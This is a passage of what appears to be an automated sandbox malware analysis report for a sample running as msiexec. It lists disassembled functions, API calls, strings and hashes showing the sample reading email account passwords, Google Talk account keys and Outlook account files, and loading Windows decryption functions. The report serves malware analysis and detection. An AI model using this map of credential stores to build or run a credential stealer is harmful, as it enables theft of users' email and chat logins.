                                                                                        • Opcode ID: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                        • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                        • Opcode Fuzzy Hash: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                        • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                                        Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 307 40ba28-40ba3a 308 40ba87-40ba9b call 406c62 307->308 309 40ba3c-40ba52 call 407e20 _mbsicmp 307->309 331 40ba9d call 4107f1 308->331 332 40ba9d call 404734 308->332 333 40ba9d call 404785 308->333 334 40ba9d call 403c16 308->334 314 40ba54-40ba6d call 407e20 309->314 315 40ba7b-40ba85 309->315 321 40ba74 314->321 322 40ba6f-40ba72 314->322 315->308 315->309 316 40baa0-40bab3 call 407e30 323 40bab5-40bac1 316->323 324 40bafa-40bb09 SetCursor 316->324 325 40ba75-40ba76 call 40b5e5 321->325 322->325 326 40bac3-40bace 323->326 327 40bad8-40baf7 qsort 323->327 325->315 326->327 327->324 331->316 332->316 333->316 334->316
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor_mbsicmpqsort
                                                                                        • String ID: /nosort$/sort
                                                                                        • API String ID: 882979914-1578091866
                                                                                        • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                        • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                        • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                        • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                        Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004109F7
                                                                                          • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                          • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                        • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                        • memset.MSVCRT ref: 00410A32
                                                                                        • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3143880245-0
                                                                                        • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                        • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                        • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                        • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                        Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 358 44b33b-44b342 359 44b344-44b34a ??3@YAXPAX@Z 358->359 360 44b34b-44b352 358->360 359->360 361 44b354-44b35a ??3@YAXPAX@Z 360->361 362 44b35b-44b362 360->362 361->362 363 44b364-44b36a ??3@YAXPAX@Z 362->363 364 44b36b-44b372 362->364 363->364 365 44b374-44b37a ??3@YAXPAX@Z 364->365 366 44b37b 364->366 365->366
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??3@
                                                                                        • String ID:
                                                                                        • API String ID: 613200358-0
                                                                                        • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                        • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                        • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                        • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                        Function 00410DBB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 367 410dbb-410dd2 call 410d0e 370 410dd4-410ddd call 4070ae 367->370 371 410dfd-410e1b memset 367->371 380 410ddf-410de2 370->380 381 410dee-410df1 370->381 372 410e27-410e35 371->372 373 410e1d-410e20 371->373 376 410e45-410e4f call 410a9c 372->376 373->372 375 410e22-410e25 373->375 375->372 378 410e37-410e40 375->378 384 410e51-410e76 call 410d3d call 410add 376->384 385 410e7f-410e92 _mbscpy 376->385 378->376 380->371 383 410de4-410de7 380->383 387 410df8 381->387 383->371 386 410de9-410dec 383->386 384->385 388 410e95-410e97 385->388 386->371 386->381 387->388
                                                                                        APIs
                                                                                          • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                                          • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                        • memset.MSVCRT ref: 00410E10
                                                                                        • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                          • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                        Strings
                                                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                        • API String ID: 119022999-2036018995
                                                                                        • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                        • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                        • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                        • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                        Function 004085D2 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 79COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 393 4085d2-408605 call 44b090 call 4082cd call 410a9c 400 4086d8-4086dd 393->400 401 40860b-40863d memset call 410b62 393->401 404 4086c7-4086cc 401->404 405 408642-40865a call 410a9c 404->405 406 4086d2 404->406 409 4086b1-4086c2 call 410b62 405->409 410 40865c-4086ab memset call 410add call 40848b 405->410 406->400 409->404 410->409
                                                                                        APIs
                                                                                          • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                          • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                          • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                          • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                          • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                          • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                          • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                          • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                          • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                          • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                        • memset.MSVCRT ref: 00408620
                                                                                          • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                        • memset.MSVCRT ref: 00408671
                                                                                        Strings
                                                                                        • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$ByteCharMultiNameWidestrlen$ComputerEnumUser
                                                                                        • String ID: Software\Google\Google Talk\Accounts
                                                                                        • API String ID: 3996936265-1079885057
                                                                                        • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                        • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                        • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                        • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                                        Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 441 40ce70-40cea1 call 4023b2 call 401e69 446 40cea3-40cea6 441->446 447 40ceb8 441->447 448 40ceb2 446->448 449 40cea8-40ceb0 446->449 450 40cebd-40cecc _strcmpi 447->450 451 40ceb4-40ceb6 448->451 449->451 452 40ced3-40cedc call 40cdda 450->452 453 40cece-40ced1 450->453 451->450 454 40cede-40cef7 call 40c3d0 call 40ba28 452->454 459 40cf3f-40cf43 452->459 453->454 462 40cef9-40cefd 454->462 463 40cf0e 454->463 464 40cf0a-40cf0c 462->464 465 40ceff-40cf08 462->465 466 40cf13-40cf30 call 40affa 463->466 464->466 465->466 468 40cf35-40cf3a call 40c580 466->468 468->459
                                                                                        APIs
                                                                                          • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                          • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                          • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                          • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                          • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                        • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: strlen$_strcmpimemset
                                                                                        • String ID: /stext
                                                                                        • API String ID: 520177685-3817206916
                                                                                        • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                        • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                        • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                        • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                        Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                        • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                        • String ID:
                                                                                        • API String ID: 145871493-0
                                                                                        • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                        • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                        • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                        • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                        Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                          • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                          • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                          • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                        • String ID:
                                                                                        • API String ID: 4165544737-0
                                                                                        • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                        • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                        • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                        • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                        Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID:
                                                                                        • API String ID: 3664257935-0
                                                                                        • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                        • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                        • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                        • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                        Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                        • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                        • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                        • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                        Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID:
                                                                                        • API String ID: 3664257935-0
                                                                                        • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                        • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                        • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                        • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                        Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseFind
                                                                                        • String ID:
                                                                                        • API String ID: 1863332320-0
                                                                                        • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                        • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                        • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                        • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                        Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                        • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                        • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                        • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

                                                                                        Non-executed Functions

                                                                                        Function 004047CB Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                                                                        • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                        • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                        • API String ID: 2238633743-192783356
                                                                                        • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                        • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                        • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                        • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                        Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileString_mbscmpstrlen
                                                                                        • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                        • API String ID: 3963849919-1658304561
                                                                                        • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                        • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                        • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                        • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                        Function 004016FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@??3@memcpymemset
                                                                                        • String ID: (yE$(yE$(yE
                                                                                        • API String ID: 1865533344-362086290
                                                                                        • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                        • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                        • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                        • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                        Function 00443C71 Relevance: 69.3, APIs: 23, Strings: 23, Instructions: 313stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                        • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                        • API String ID: 1714764973-479759155
                                                                                        • Opcode ID: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                                                        • Instruction ID: 3e95309f0516475de87f4a3b36a82bfae981417ea13aa6096d07c622cb899a74
                                                                                        • Opcode Fuzzy Hash: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                                                        • Instruction Fuzzy Hash: FB91A9726087056AF224BB36DD43B9F33D8EF4071DF20042FF85AA6182EE6DBA05461D
                                                                                        Function 0040E934 Relevance: 68.7, APIs: 26, Strings: 13, Instructions: 483COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040EBD8
                                                                                          • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                          • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                          • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                        • memset.MSVCRT ref: 0040EC2B
                                                                                        • memset.MSVCRT ref: 0040EC47
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                        • memset.MSVCRT ref: 0040ECDD
                                                                                        • memset.MSVCRT ref: 0040ECF2
                                                                                        • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                        • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                        • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                        • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                        • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                        • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                        • memset.MSVCRT ref: 0040EDE1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
